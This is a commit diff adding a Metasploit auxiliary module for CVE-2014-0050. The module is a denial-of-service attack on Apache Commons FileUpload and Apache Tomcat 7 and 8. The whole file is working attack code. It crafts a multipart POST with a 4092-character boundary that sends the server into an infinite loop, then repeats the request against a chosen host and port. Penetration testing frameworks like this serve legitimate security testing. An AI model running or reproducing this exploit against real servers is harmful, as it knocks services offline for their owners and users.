Add module for CVE-2014-0050
parent
998fa06912
commit
8f7f1d0497
|
@ -0,0 +1,76 @@
|
|||
##
|
||||
# This module requires Metasploit: http//metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit4 < Msf::Auxiliary
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
include Msf::Auxiliary::Dos
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Apache Commons FileUpload and Apache Tomcat DoS',
|
||||
'Description' => %q{
|
||||
This module triggers an inifinite loop in Apache Commons FileUpload 1.0 through 1.3
|
||||
via a Content-Type header.
|
||||
Apache Tomcat 7 and Apache Tomcat 8 use a copy of Apache Commons FileUpload
|
||||
to handle mime-multipart requests, therefore, Apache Tomcat 7.0.0 through 7.0.50
|
||||
and 8.0.0-RC1 through 8.0.1 are affected by this issue.
|
||||
Tomcat 6 also uses Commons FileUpload as part of the Manager application.
|
||||
},
|
||||
'Author' =>
|
||||
[
|
||||
'This issue was reported to the Apache Software Foundation and accidently made public.', # advisory
|
||||
'ribeirux' # metasploit module
|
||||
],
|
||||
'License' => MSF_LICENSE,
|
||||
'References' =>
|
||||
[
|
||||
['CVE', '2014-0050'],
|
||||
['URL', 'http://markmail.org/message/kpfl7ax4el2owb3o'],
|
||||
['URL', 'http://tomcat.apache.org/security-8.html'],
|
||||
['URL', 'http://tomcat.apache.org/security-7.html'],
|
||||
],
|
||||
'DisclosureDate' => 'Feb 6 2014'
|
||||
))
|
||||
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(8080),
|
||||
OptString.new('URI', [ true, "The request URI", '/']),
|
||||
OptInt.new('RLIMIT', [ true, "Number of requests to send",50])
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def run
|
||||
boundary = "0"*4092
|
||||
opts = {
|
||||
'method' => "POST",
|
||||
'uri' => normalize_uri(datastore['URI']),
|
||||
'ctype' => "multipart/form-data; boundary=#{boundary}",
|
||||
'data' => "#{boundary}00000",
|
||||
'headers' => {
|
||||
'Accept' => '*/*'
|
||||
}
|
||||
}
|
||||
|
||||
for x in 1..datastore['RLIMIT']
|
||||
print_status("Sending request #{x} to #{rhost}:#{rport}")
|
||||
begin
|
||||
c = connect
|
||||
r = c.request_cgi(opts)
|
||||
c.send_request(r)
|
||||
# Don't wait for a response
|
||||
rescue ::Rex::ConnectionError => exception
|
||||
print_error("#{rhost}:#{rport} - Unable to connect: '#{exception.message}'")
|
||||
return
|
||||
ensure
|
||||
disconnect(c) if c
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
|
Loading…
Reference in New Issue